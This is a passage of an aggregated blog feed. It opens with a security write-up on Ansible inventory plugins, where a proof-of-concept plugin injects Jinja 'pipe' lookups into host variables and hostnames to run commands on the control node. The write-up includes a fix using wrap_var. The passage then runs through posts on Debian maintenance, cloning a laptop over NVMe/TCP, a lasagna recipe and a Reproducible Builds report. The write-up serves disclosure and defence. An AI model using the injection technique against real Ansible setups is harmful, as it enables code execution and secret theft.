<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">,</span> <span class="s1">'something_funny'</span><span class="p">,</span> <span class="s1">'{{ lookup("pipe", "touch /tmp/hacked" ) }}'</span><span class="p">)</span>
</pre></div>
<p>The code is mostly copy & paste from the <a href="https://docs.ansible.com/ansible/latest/dev_guide/developing_inventory.html">Developing dynamic inventory</a> docs for Ansible and does three things:</p>
<ol>
<li>defines the plugin name as <code>evgeni.inventoryrce.inventory</code></li>
<li>accepts any config that ends with <code>evgeni.yml</code> (we'll need that to trigger the use of this inventory later)</li>
<li>adds an imaginary host <code>exploit.example.com</code> with <code>local</code> connection type and <code>something_funny</code> variable to the inventory</li>
</ol>
<p>In reality this would be talking to some API, iterating over hosts known to it, fetching their data, etc.
But the structure of the code would be very similar.</p>
<p>The crucial part is that if we have a string with a Jinja expression, we can set it as a variable for a host.</p>
<h3>Using the example inventory plugin</h3>
<p>Now we install the collection containing this inventory plugin,
or rather write the code to <code>~/.ansible/collections/ansible_collections/evgeni/inventoryrce/plugins/inventory/inventory.py</code>
(or wherever your Ansible loads its collections from).</p>
<p>And we create a configuration file.
As there is nothing to configure, it can be empty and only needs to have the right filename: <code>touch inventory.evgeni.yml</code> is all you need.</p>
<p>If we now call <code>ansible-inventory</code>, we'll see our host and our variable present:</p>
<div class="code"><pre class="code literal-block"><span class="gp">% </span><span class="nv">ANSIBLE_INVENTORY_ENABLED</span><span class="o">=</span>evgeni.inventoryrce.inventory<span class="w"> </span>ansible-inventory<span class="w"> </span>-i<span class="w"> </span>inventory.evgeni.yml<span class="w"> </span>--list
<span class="go">{</span>
<span class="go"> "_meta": {</span>
<span class="go"> "hostvars": {</span>
<span class="go"> "exploit.example.com": {</span>
<span class="go"> "ansible_connection": "local",</span>
<span class="go"> "something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"</span>
<span class="go"> }</span>
<span class="go"> }</span>
<span class="go"> },</span>
<span class="go"> "all": {</span>
<span class="go"> "children": [</span>
<span class="go"> "ungrouped"</span>
<span class="go"> ]</span>
<span class="go"> },</span>
<span class="go"> "ungrouped": {</span>
<span class="go"> "hosts": [</span>
<span class="go"> "exploit.example.com"</span>
<span class="go"> ]</span>
<span class="go"> }</span>
<span class="go">}</span>
</pre></div>
<p>(<a href="https://docs.ansible.com/ansible/latest/reference_appendices/config.html#envvar-ANSIBLE_INVENTORY_ENABLED"><code>ANSIBLE_INVENTORY_ENABLED=evgeni.inventoryrce.inventory</code></a> is required to allow the use of our inventory plugin, as it's not in the default list.)</p>
<p>So far, nothing dangerous has happened.
The inventory got generated, the host is present, the funny variable is set, but it's still only a string.</p>
<h3>Executing a playbook, interpreting Jinja</h3>
<p>To execute the code we'd need to use the variable in a context where Jinja is used.
This could be a template where you actually use this variable, like a report where you print the comment the creator has added to a VM.</p>
<p>Or a <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/debug_module.html"><code>debug</code></a> task where you dump all variables of a host to analyze what's set.
Let's use that!</p>
<div class="code"><pre class="code literal-block"><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">hosts</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">all</span>
<span class="w"> </span><span class="nt">tasks</span><span class="p">:</span>
<span class="w"> </span><span class="p p-Indicator">-</span><span class="w"> </span><span class="nt">name</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">Display all variables/facts known for a host</span>
<span class="w"> </span><span class="nt">ansible.builtin.debug</span><span class="p">:</span>
<span class="w"> </span><span class="nt">var</span><span class="p">:</span><span class="w"> </span><span class="l l-Scalar l-Scalar-Plain">hostvars[inventory_hostname]</span>
</pre></div>
<p>This playbook looks totally innocent: run against all hosts and dump their hostvars using <code>debug</code>.
No mention of our funny variable.
Yet, when we execute it, we see:</p>
<div class="code"><pre class="code literal-block"><span class="gp">% </span><span class="nv">ANSIBLE_INVENTORY_ENABLED</span><span class="o">=</span>evgeni.inventoryrce.inventory<span class="w"> </span>ansible-playbook<span class="w"> </span>-i<span class="w"> </span>inventory.evgeni.yml<span class="w"> </span>test.yml
<span class="go">PLAY [all] ************************************************************************************************</span>
<span class="go">TASK [Gathering Facts] ************************************************************************************</span>
<span class="go">ok: [exploit.example.com]</span>
<span class="go">TASK [Display all variables/facts known for a host] *******************************************************</span>
<span class="go">ok: [exploit.example.com] => {</span>
<span class="go"> "hostvars[inventory_hostname]": {</span>
<span class="go"> "ansible_all_ipv4_addresses": [</span>
<span class="go"> "192.168.122.1"</span>
<span class="go"> ],</span>
<span class="go"> …</span>
<span class="go"> "something_funny": ""</span>
<span class="go"> }</span>
<span class="go">}</span>
<span class="go">PLAY RECAP *************************************************************************************************</span>
<span class="go">exploit.example.com : ok=2 changed=0 unreachable=0 failed=0 skipped=0 rescued=0 ignored=0 </span>
</pre></div>
<p>We got <em>all</em> variables dumped, that was expected, but now <code>something_funny</code> is an empty string?
Jinja got executed, and the expression was <code>{{ lookup("pipe", "touch /tmp/hacked" ) }}</code> and <code>touch</code> does not return anything.
But it did create the file!</p>
<div class="code"><pre class="code literal-block"><span class="gp">% </span>ls<span class="w"> </span>-alh<span class="w"> </span>/tmp/hacked<span class="w"> </span>
<span class="go">-rw-r--r--. 1 evgeni evgeni 0 Mar 10 17:18 /tmp/hacked</span>
</pre></div>
<p>We just "hacked" the Ansible <a href="https://docs.ansible.com/ansible/latest/network/getting_started/basic_concepts.html#control-node">control node</a> (aka: your laptop),
as that's where <code>lookup</code> is executed.
It could also have used the <a href="https://docs.ansible.com/ansible/latest/collections/ansible/builtin/url_lookup.html"><code>url</code> lookup</a> to send the contents of your Ansible vault to some internet host.
Or connect to some VPN-secured system that should not be reachable from EC2/Hetzner/….</p>
<h3>Why is this possible?</h3>
<p>This happens because <a href="https://github.com/ansible/ansible/blob/56f31126ad1c69e5eda7b92c1fa15861f722af0e/lib/ansible/inventory/data.py#L245"><code>set_variable(entity, varname, value)</code></a> doesn't mark the values as unsafe and Ansible processes everything with Jinja in it.</p>
<p>In this very specific example, a possible fix would be to explicitly wrap the string in <a href="https://github.com/ansible/ansible/blob/stable-2.16/lib/ansible/utils/unsafe_proxy.py#L346-L363"><code>AnsibleUnsafeText</code> by using <code>wrap_var</code></a>:</p>
<div class="code"><pre class="code literal-block"><span class="kn">from</span> <span class="nn">ansible.utils.unsafe_proxy</span> <span class="kn">import</span> <span class="n">wrap_var</span>
<span class="err">…</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="s1">'exploit.example.com'</span><span class="p">,</span> <span class="s1">'something_funny'</span><span class="p">,</span> <span class="n">wrap_var</span><span class="p">(</span><span class="s1">'{{ lookup("pipe", "touch /tmp/hacked" ) }}'</span><span class="p">))</span>
</pre></div>
<p>Which then gets rendered as a string when dumping the variables using <code>debug</code>:</p>
<div class="code"><pre class="code literal-block"><span class="go">"something_funny": "{{ lookup(\"pipe\", \"touch /tmp/hacked\" ) }}"</span>
</pre></div>
<p>But it seems inventories don't do this:</p>
<div class="code"><pre class="code literal-block"><span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">host_vars</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="n">name</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span><span class="p">)</span>
</pre></div>
<p>(<a href="https://github.com/ansible-collections/amazon.aws/blob/89ec6ba2ee7fae84eb1aae098da040eba4974c7d/plugins/inventory/aws_ec2.py#L762-L763">aws_ec2.py</a>)</p>
<div class="code"><pre class="code literal-block"><span class="k">for</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span> <span class="ow">in</span> <span class="n">hostvars</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="n">hostname</span><span class="p">,</span> <span class="n">key</span><span class="p">,</span> <span class="n">value</span><span class="p">)</span>
</pre></div>
<p>(<a href="https://github.com/ansible-collections/hetzner.hcloud/blob/46717e2d6574b1e36db7bc73b54712f9270a2169/plugins/inventory/hcloud.py#L503-L504">hcloud.py</a>)</p>
<div class="code"><pre class="code literal-block"><span class="k">for</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span> <span class="ow">in</span> <span class="n">hostvars</span><span class="o">.</span><span class="n">items</span><span class="p">():</span>
<span class="k">try</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">set_variable</span><span class="p">(</span><span class="n">host_name</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">v</span><span class="p">)</span>
<span class="k">except</span> <span class="ne">ValueError</span> <span class="k">as</span> <span class="n">e</span><span class="p">:</span>
<span class="bp">self</span><span class="o">.</span><span class="n">display</span><span class="o">.</span><span class="n">warning</span><span class="p">(</span><span class="s2">"Could not set host info hostvar for </span><span class="si">%s</span><span class="s2">, skipping </span><span class="si">%s</span><span class="s2">: </span><span class="si">%s</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">host</span><span class="p">,</span> <span class="n">k</span><span class="p">,</span> <span class="n">to_text</span><span class="p">(</span><span class="n">e</span><span class="p">)))</span>
</pre></div>
<p>(<a href="https://github.com/theforeman/foreman-ansible-modules/blob/8ad32f166c3d1f8f4077dc3029b312c5b9dc534b/plugins/inventory/foreman.py#L516-L520">foreman.py</a>)</p>
<p>And honestly, I can totally understand that.
When developing an inventory, you do not expect to handle insecure input data.
You also expect the API to handle the data in a secure way by default.
But <code>set_variable</code> doesn't allow you to tag data as "safe" or "unsafe" easily and data in Ansible defaults to "safe".</p>
<h3>Can something similar happen in other parts of Ansible?</h3>
<p>It certainly happened in the past that Jinja was abused in Ansible: <a href="https://bugzilla.redhat.com/CVE-2016-9587">CVE-2016-9587</a>, <a href="https://bugzilla.redhat.com/CVE-2017-7466">CVE-2017-7466</a>, <a href="https://bugzilla.redhat.com/CVE-2017-7481">CVE-2017-7481</a></p>
<p>But even if we only look at inventories, <a href="https://github.com/ansible/ansible/blob/56f31126ad1c69e5eda7b92c1fa15861f722af0e/lib/ansible/inventory/data.py#L191"><code>add_host(host)</code></a> can be abused in a similar way:</p>
<div class="code"><pre class="code literal-block"><span class="kn">from</span> <span class="nn">ansible.plugins.inventory</span> <span class="kn">import</span> <span class="n">BaseInventoryPlugin</span>
<span class="k">class</span> <span class="nc">InventoryModule</span><span class="p">(</span><span class="n">BaseInventoryPlugin</span><span class="p">):</span>
<span class="n">NAME</span> <span class="o">=</span> <span class="s1">'evgeni.inventoryrce.inventory'</span>
<span class="k">def</span> <span class="nf">verify_file</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">path</span><span class="p">):</span>
<span class="n">valid</span> <span class="o">=</span> <span class="kc">False</span>
<span class="k">if</span> <span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">verify_file</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
<span class="k">if</span> <span class="n">path</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'evgeni.yml'</span><span class="p">):</span>
<span class="n">valid</span> <span class="o">=</span> <span class="kc">True</span>
<span class="k">return</span> <span class="n">valid</span>
<span class="k">def</span> <span class="nf">parse</span><span class="p">(</span><span class="bp">self</span><span class="p">,</span> <span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="o">=</span><span class="kc">True</span><span class="p">):</span>
<span class="nb">super</span><span class="p">(</span><span class="n">InventoryModule</span><span class="p">,</span> <span class="bp">self</span><span class="p">)</span><span class="o">.</span><span class="n">parse</span><span class="p">(</span><span class="n">inventory</span><span class="p">,</span> <span class="n">loader</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">cache</span><span class="p">)</span>
<span class="bp">self</span><span class="o">.</span><span class="n">inventory</span><span class="o">.</span><span class="n">add_host</span><span class="p">(</span><span class="s1">'lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}'</span><span class="p">)</span>
</pre></div>
<div class="code"><pre class="code literal-block"><span class="gp">% </span><span class="nv">ANSIBLE_INVENTORY_ENABLED</span><span class="o">=</span>evgeni.inventoryrce.inventory<span class="w"> </span>ansible-playbook<span class="w"> </span>-i<span class="w"> </span>inventory.evgeni.yml<span class="w"> </span>test.yml
<span class="go">PLAY [all] ************************************************************************************************</span>
<span class="go">TASK [Gathering Facts] ************************************************************************************</span>
<span class="go">fatal: [lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }}]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: ssh: Could not resolve hostname lol: No address associated with hostname", "unreachable": true}</span>
<span class="go">PLAY RECAP ************************************************************************************************</span>
<span class="go">lol{{ lookup("pipe", "touch /tmp/hacked-host" ) }} : ok=0 changed=0 unreachable=1 failed=0 skipped=0 rescued=0 ignored=0</span>
<span class="gp">% </span>ls<span class="w"> </span>-alh<span class="w"> </span>/tmp/hacked-host
<span class="go">-rw-r--r--. 1 evgeni evgeni 0 Mar 13 08:44 /tmp/hacked-host</span>
</pre></div>
<h3>Affected versions</h3>
<p>I've tried this on Ansible (core) 2.13.13 and 2.16.4.
I'd totally expect older versions to be affected too, but I have not verified that.</p>2024-03-11T20:00:00+00:00evgeniThorsten Alteholz: My Debian Activities in February 2024
http://blog.alteholz.eu/2024/03/my-debian-activities-in-february-2024/
<h3><strong>FTP master</strong></h3>
<p>This month I accepted 242 and rejected 42 packages. The overall number of packages that got accepted was 251.<br /><br />
This was just a short month and the weather outside was not really motivating. I hope it will be better in March.
</p><h3><strong>Debian LTS</strong></h3>
<p>This was my hundred-sixteenth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian.</p>
<p>During my allocated time I uploaded:</p>
<ul><li>[<a href="https://www.debian.or/lts/security/2023/dla-3739-1">DLA 3739-1</a>] libjwt security update for one CVE to fix some ‘constant-time-for-execution-issue</li><li>[libjwt] upload to unstable</li><li>[<a href="https://bugs.debian.org/1064550">#1064550</a>] Bullseye PU bug for libjwt</li><li>[<a href="https://bugs.debian.org/1064551">#1064551</a>] Bookworm PU bug for libjwt</li><li>[<a href="https://bugs.debian.org/1064551">#1064551</a>] Bookworm PU bug for libjwt; upload after approval</li><li>[<a href="https://www.debian.org/lts/security/2023/dla-3741-1">DLA 3741-1</a>] engrampa security update for one CVE to fix a path traversal issue with CPIO archives</li><li>[<a href="https://bugs.debian.org/1060186">#1060186</a>] Bookworm PU-bug for libde265 was flagged for acceptance</li><li>[<a href="https://bugs.debian.org/1056935">#1056935</a>] Bullseye PU-bug for libde265 was flagged for acceptance</li></ul>
<p>I also started to work on <i>qtbase-opensource-src</i> (an update is needed for ELTS, so an LTS update seems to be appropriate as well, especially as there are postponed CVE).</p>
<h3><strong>Debian ELTS</strong></h3>
<p>This month was the sixty-seventth ELTS month. During my allocated time I uploaded:</p>
<ul><li>[ELA-1047-1]bind9 security update for one CVE to fix an stack exhaustion issue in Jessie and Stretch</li></ul>
<p>The upload of <i>bind9</i> was a bit exciting, but all occuring issues with the new upload workflow could be quickly fixed by Helmut and the packages finally reached their destination. I wonder why it is always me who stumbles upon special cases? This month I also worked on the Jessie and Stretch updates for <i>exim4</i>. I also started to work on an update for <i>qtbase-opensource-src</i> in Stretch (and LTS and other releases as well).</p>
<h3><strong>Debian Printing</strong></h3>
<p>This month I uploaded new upstream versions of:</p>
<ul><li>… <a href="https://tracker.debian.org/cpdb-libs">cpdb-libs</a></li></ul>
<p></p>
<p><strong>This work is generously funded by <a href="https://www.freexian.com">Freexian</a>!</strong></p>
<h3><strong>Debian Matomo</strong></h3>
<p>I started a new team <a href="https://qa.debian.org/developer.php?email=debian-matomo-maintainers%40alioth-lists.debian.net">debian-matomo-maintainers</a>. Within this team all matomo related packages should be handled. PHP PEAR or PECL packages shall be still maintained in their corresponding teams.</p>
<p>This month I uploaded:</p>
<ul><li>… <a href="https://tracker.debian.org/matomo-searchengine-and-social-list">matomo-searchengine-and-social-list</a></li><li>… <a href="https://tracker.debian.org/matomo-referrer-spam-list">matomo-referrer-spam-list</a></li><li>… <a href="https://tracker.debian.org/matomo-php-tracker">matomo-php-tracker</a></li><li>… <a href="https://tracker.debian.org/matomo-device-detector">matomo-device-detector</a></li><li>… <a href="https://tracker.debian.org/matomo-component-ini">matomo-component-ini</a></li></ul>
<p><strong>This work is generously funded by <a href="https://www.freexian.com">Freexian</a>!</strong></p>
<h3><strong>Debian Astro</strong></h3>
<p>This month I uploaded a new upstream version of:</p>
<ul><li>… <a href="https://tracker.debian.org/libahp-xc">libahp-xc</a></li></ul>
<h3><strong>Debian IoT</strong></h3>
<p>This month I uploaded new upstream versions of:</p>
<ul><li>… <a href="https://tracker.debian.org/pyicloud">libjwt</a> to fix a CVE</li></ul>2024-03-10T12:22:52+00:00alteholzVasudev Kamath: Cloning a laptop over NVME TCP
https://copyninja.in/blog/clone_laptop_nvmet.html
<p>Recently, I got a new laptop and had to set it up so I could start using it. But
I wasn't really in the mood to go through the same old steps which I had
explained in this <a class="reference external" href="https://copyninja.in/blog/live_install_debian.html">post earlier</a>. I was complaining about
this to my colleague, and there came the suggestion of why not copy the entire
disk to the new laptop. Though it sounded like an interesting idea to me, I had
my doubts, so here is what I told him in return.</p>
<ol class="arabic simple">
<li>I don't have the tools to open my old laptop and connect the new disk over
USB to my new laptop.</li>
<li>I use full disk encryption, and my old laptop has a 512GB disk, whereas the
new laptop has a 1TB NVME, and I'm not so familiar with resizing LUKS.</li>
</ol>
<p>He promptly suggested both could be done. For step 1, just expose the disk using
NVME over TCP and connect it over the network and do a full disk copy, and the
rest is pretty simple to achieve. In short, he suggested the following:</p>
<ol class="arabic simple">
<li>Export the disk using nvmet-tcp from the old laptop.</li>
<li>Do a disk copy to the new laptop.</li>
<li>Resize the partition to use the full 1TB.</li>
<li>Resize LUKS.</li>
<li>Finally, resize the BTRFS root disk.</li>
</ol>
<div class="section" id="exporting-disk-over-nvme-tcp">
<h2>Exporting Disk over NVME TCP</h2>
<p>The easiest way suggested by my colleague to do this is using
<a class="reference external" href="https://www.freedesktop.org/software/systemd/man/latest/systemd-storagetm.service.html">systemd-storagetm.service</a>.
This service can be invoked by simply booting into <em>storage-target-mode.target</em>
by specifying <em>rd.systemd.unit=storage-target-mode.target</em>. But he suggested not
to use this as I need to tweak the dracut initrd image to involve network
services as well as configuring WiFi from this mode is a painful thing to do.</p>
<p>So alternatively, I simply booted both my laptops with GRML rescue CD. And the
following step was done to export the NVME disk on my current laptop using the
nvmet-tcp module of Linux:</p>
<div class="highlight"><pre><span></span>modprobe<span class="w"> </span>nvmet-tcp
<span class="nb">cd</span><span class="w"> </span>/sys/kernel/config/nvmet
mkdir<span class="w"> </span>ports/0
<span class="nb">cd</span><span class="w"> </span>ports/0
<span class="nb">echo</span><span class="w"> </span><span class="s2">"ipv4"</span><span class="w"> </span>><span class="w"> </span>addr_adrfam
<span class="nb">echo</span><span class="w"> </span><span class="m">0</span>.0.0.0<span class="w"> </span>><span class="w"> </span>addr_traaddr
<span class="nb">echo</span><span class="w"> </span><span class="m">4420</span><span class="w"> </span>><span class="w"> </span>addr_trsvcid
<span class="nb">echo</span><span class="w"> </span>tcp<span class="w"> </span>><span class="w"> </span>addr_trtype
<span class="nb">cd</span><span class="w"> </span>/sys/kernel/config/nvmet/subsystems
mkdir<span class="w"> </span>testnqn
<span class="nb">echo</span><span class="w"> </span><span class="m">1</span><span class="w"> </span>>testnqn/allow_any_host
mkdir<span class="w"> </span>testnqn/namespaces/1
<span class="nb">cd</span><span class="w"> </span>testnqn
<span class="c1"># replace the device name with the disk you want to export</span>
<span class="nb">echo</span><span class="w"> </span><span class="s2">"/dev/nvme0n1"</span><span class="w"> </span>><span class="w"> </span>namespaces/1/device_path
<span class="nb">echo</span><span class="w"> </span><span class="m">1</span><span class="w"> </span>><span class="w"> </span>namespaces/1/enable
ln<span class="w"> </span>-s<span class="w"> </span><span class="s2">"../../subsystems/testnqn"</span><span class="w"> </span>/sys/kernel/config/nvmet/ports/0/subsystems/testnqn
</pre></div>
<p>These steps ensure that the device is now exported using NVME over TCP. The next
step is to detect this on the new laptop and connect the device:</p>
<div class="highlight"><pre><span></span>nvme<span class="w"> </span>discover<span class="w"> </span>-t<span class="w"> </span>tcp<span class="w"> </span>-a<span class="w"> </span><ip><span class="w"> </span>-s<span class="w"> </span><span class="m">4420</span>
nvme<span class="w"> </span>connectl-all<span class="w"> </span>-t<span class="w"> </span>tcp<span class="w"> </span>-a<span class="w"> </span><><span class="w"> </span>-s<span class="w"> </span><span class="m">4420</span>
</pre></div>
<p>Finally, <tt class="docutils literal">nvme list</tt> shows the device which is connected to the new laptop,
and we can proceed with the next step, which is to do the disk copy.</p>
</div>
<div class="section" id="copying-the-disk">
<h2>Copying the Disk</h2>
<p>I simply used the <tt class="docutils literal">dd</tt> command to copy the root disk to my new laptop. Since
the new laptop didn't have an Ethernet port, I had to rely only on WiFi, and it
took about 7 and a half hours to copy the entire 512GB to the new laptop. The
speed at which I was copying was about 18-20MB/s. The other option would have
been to create an initial partition and file system and do an rsync of the root
disk or use BTRFS itself for file system transfer.</p>
<div class="highlight"><pre><span></span>dd<span class="w"> </span><span class="k">if</span><span class="o">=</span>/dev/nvme2n1<span class="w"> </span><span class="nv">of</span><span class="o">=</span>/dev/nvme0n1<span class="w"> </span><span class="nv">status</span><span class="o">=</span>progress<span class="w"> </span><span class="nv">bs</span><span class="o">=</span>40M
</pre></div>
</div>
<div class="section" id="resizing-partition-and-luks-container">
<h2>Resizing Partition and LUKS Container</h2>
<p>The final part was very easy. When I launched <tt class="docutils literal">parted</tt>, it detected that the
partition table does not match the disk size and asked if it can fix it, and I
said yes. Next, I had to install <tt class="docutils literal"><span class="pre">cloud-guest-utils</span></tt> to get <tt class="docutils literal">growpart</tt> to
fix the second partition, and the following command extended the partition to
the full 1TB:</p>
<div class="highlight"><pre><span></span>growpart<span class="w"> </span>/dev/nvem0n1<span class="w"> </span>p2
</pre></div>
<p>Next, I used <tt class="docutils literal"><span class="pre">cryptsetup-resize</span></tt> to increase the LUKS container size.</p>
<div class="highlight"><pre><span></span>cryptsetup<span class="w"> </span>luksOpen<span class="w"> </span>/dev/nvme0n1p2<span class="w"> </span>ENC
cryptsetup<span class="w"> </span>resize<span class="w"> </span>ENC
</pre></div>
<p>Finally, I rebooted into the disk, and everything worked fine. After logging
into the system, I resized the BTRFS file system. BTRFS requires the system to
be mounted for resize, so I could not attempt it in live boot.</p>
<div class="highlight"><pre><span></span>btfs<span class="w"> </span>fielsystem<span class="w"> </span>resize<span class="w"> </span>max<span class="w"> </span>/
</pre></div>
</div>
<div class="section" id="conclussion">
<h2>Conclussion</h2>
<p>The only benefit of this entire process is that I have a new laptop, but I still
feel like I'm using my existing laptop. Typically, setting up a new laptop takes
about a week or two to completely get adjusted, but in this case, that entire
time is saved.</p>
<p>An added benefit is that I learned how to export disks using NVME over TCP,
thanks to my colleague. This new knowledge adds to the value of the experience.</p>
</div>2024-03-10T11:45:00+00:00copyninjaValhalla's Things: Low Fat, No Eggs, Lasagna-ish
https://blog.trueelena.org/blog/drafts/low_fat_no_eggs_lasagna_ish/index.html
<article>
<section class="header">
Posted on March 10, 2024
<br />
Tags: <a href="https://blog.trueelena.org/tags/madeof%3Aatoms.html" title="All pages tagged 'madeof:atoms'.">madeof:atoms</a>, <a href="https://blog.trueelena.org/tags/craft%3Acooking.html" title="All pages tagged 'craft:cooking'.">craft:cooking</a>
</section>
<section>
<p>A few notes on what we had for lunch, to be able to repeat it after the
summer.</p>
<p>There were a number of food intolerance related restrictions which meant
that the traditional lasagna recipe wasn’t an option; the result still
tasted good, but it was a bit softer and messier to take out of the pan
and into the dishes.</p>
<p>On Saturday afternoon we made fresh no-egg pasta with 200 g (durum)
flour and 100 g water, after about 1 hour it was divided in 6 parts and
rolled to thickness #6 on the pasta machine.</p>
<p>Meanwhile, about 500 ml of low fat almost-ragù-like meat sauce was taken
out of the freezer: this was a bit too little, 750 ml would have been
better.</p>
<p>On Saturday evening we made a sauce with 1 l of low-fat milk and 80 g of
flour, and the meat sauce was heated up.</p>
<p>Then everything was put in a 28 cm × 23 cm pan, with 6 layers of pasta and
7 layers of the two sauces, and left to cool down.</p>
<p>And on Sunday morning it was baked for 35 min in the oven at 180 °C.</p>
<p>With 3 people we only had about two thirds of it.</p>
<p>Next time I think we should try to use 400 - 500 g of flour (so that
it’s easier to work by machine), 2 l of milk, 1.5 l of meat sauce and
divide it into 3 pans: one to eat the next day and two to freeze
(uncooked) for another day.</p>
<p>No pictures, because by the time I thought about writing a post we were
already more than halfway through eating it :)</p>
</section>
</article>2024-03-10T00:00:00+00:00Elena “of Valhalla”Reproducible Builds: Reproducible Builds in February 2024
https://reproducible-builds.org/reports/2024-02/
<p><a href="https://reproducible-builds.org/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/reproducible-builds.png#right" /></a></p>
<p><strong>Welcome to the February 2024 report from the <a href="https://reproducible-builds.org">Reproducible Builds</a> project!</strong> In our reports, we try to outline what we have been up to over the past month as well as mentioning some of the important things happening in software supply-chain security.</p>
<hr />
<h3 id="reproducible-builds-at-fosdem-2024"><a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/">Reproducible Builds at FOSDEM 2024</a></h3>
<p><a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/fosdem.jpeg#right" /></a></p>
<p>Core Reproducible Builds developer Holger Levsen presented at the main track at <a href="https://fosdem.org/2024/">FOSDEM</a> on Saturday 3rd February this year in Brussels, Belgium. However, that wasn’t the only talk related to Reproducible Builds.</p>
<p>However, please see our <a href="https://reproducible-builds.org/news/2024/02/08/reproducible-builds-at-fosdem-2024/"><strong>comprehensive FOSDEM 2024 news post</strong></a> for the full details and links.</p>
<p><br /></p>
<h3 id="maintainer-perspectives-on-open-source-software-security"><a href="https://www.linuxfoundation.org/research/maintainer-perspectives-on-security?hsLang=en"><em>Maintainer Perspectives on Open Source Software Security</em></a></h3>
<p><a href="https://www.linuxfoundation.org/research/maintainer-perspectives-on-security?hsLang=en"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/maintainer-perspectives.png#right" /></a></p>
<p>Bernhard M. Wiedemann spotted that a recent report entitled <a href="https://www.linuxfoundation.org/research/maintainer-perspectives-on-security?hsLang=en"><em>Maintainer Perspectives on Open Source Software Security</em></a> written by Stephen Hendrick and Ashwin Ramaswami of the <a href="https://www.linuxfoundation.org/">Linux Foundation</a> sports an infographic which mentions that “<a href="https://www.linuxfoundation.org/hubfs/LF%20Research/MaintainerSecurityBPs_Infographic.pdf">56% of [polled] projects support reproducible builds</a>”.</p>
<p><br /></p>
<h3 id="three-new-reproducibility-related-academic-papers">Three new reproducibility-related academic papers</h3>
<p>A total of three separate scholarly papers related to Reproducible Builds have appeared this month:</p>
<p><a href="https://arxiv.org/abs/2401.14635"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/arXiv-2401.14635.png#right" /></a></p>
<p><a href="https://arxiv.org/abs/2401.14635"><em>Signing in Four Public Software Package Registries: Quantity, Quality, and Influencing Factors</em></a> by Taylor R. Schorlemmer, Kelechi G. Kalu, Luke Chigges, Kyung Myung Ko, Eman Abdul-Muhd, Abu Ishgair, Saurabh Bagchi, Santiago Torres-Arias and James C. Davis (<a href="https://www.purdue.edu/">Purdue University</a>, Indiana, USA) is concerned with the problem that:</p>
<blockquote>
<p>Package maintainers can guarantee package authorship through software signing [but] it is unclear how common this practice is, and whether the resulting signatures are created properly. Prior work has provided raw data on signing practices, but measured single platforms, did not consider time, and did not provide insight on factors that may influence signing. We lack a comprehensive, multi-platform understanding of signing adoption and relevant factors. This study addresses this gap. (<a href="https://arxiv.org/abs/2401.14635">arXiv</a>, <a href="https://arxiv.org/pdf/2401.14635.pdf">full PDF</a>)</p>
</blockquote>
<p><br /></p>
<p><a href="https://arxiv.org/abs/2402.00424"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/arXiv-2402.00424.png#right" /></a></p>
<p><a href="https://arxiv.org/abs/2402.00424"><em>Reproducibility of Build Environments through Space and Time</em></a> by Julien Malka, Stefano Zacchiroli and Théo Zimmermann (<a href="https://www.ip-paris.fr/">Institut Polytechnique de Paris</a>, France) addresses:</p>
<blockquote>
<p>[The] principle of reusability […] makes it harder to reproduce projects’ build environments, even though reproducibility of build environments is essential for collaboration, maintenance and component lifetime. In this work, we argue that functional package managers provide the tooling to make build environments reproducible in space and time, and we produce a preliminary evaluation to justify this claim.</p>
</blockquote>
<p>The abstract continues with the claim that “Using historical data, we show that we are able to reproduce build environments of about 7 million <a href="https://nixos.org/">Nix</a> packages, and to rebuild 99.94% of the 14 thousand packages from a 6-year-old Nixpkgs revision. (<a href="https://arxiv.org/abs/2402.00424">arXiv</a>, <a href="https://arxiv.org/pdf/2402.00424.pdf">full PDF</a>)</p>
<p><br /></p>
<p><a href="https://inria.hal.science/hal-04441579v2"><img alt="" src="https://reproducible-builds.org/images/reports/2024-02/msr24.png#right" /></a></p>
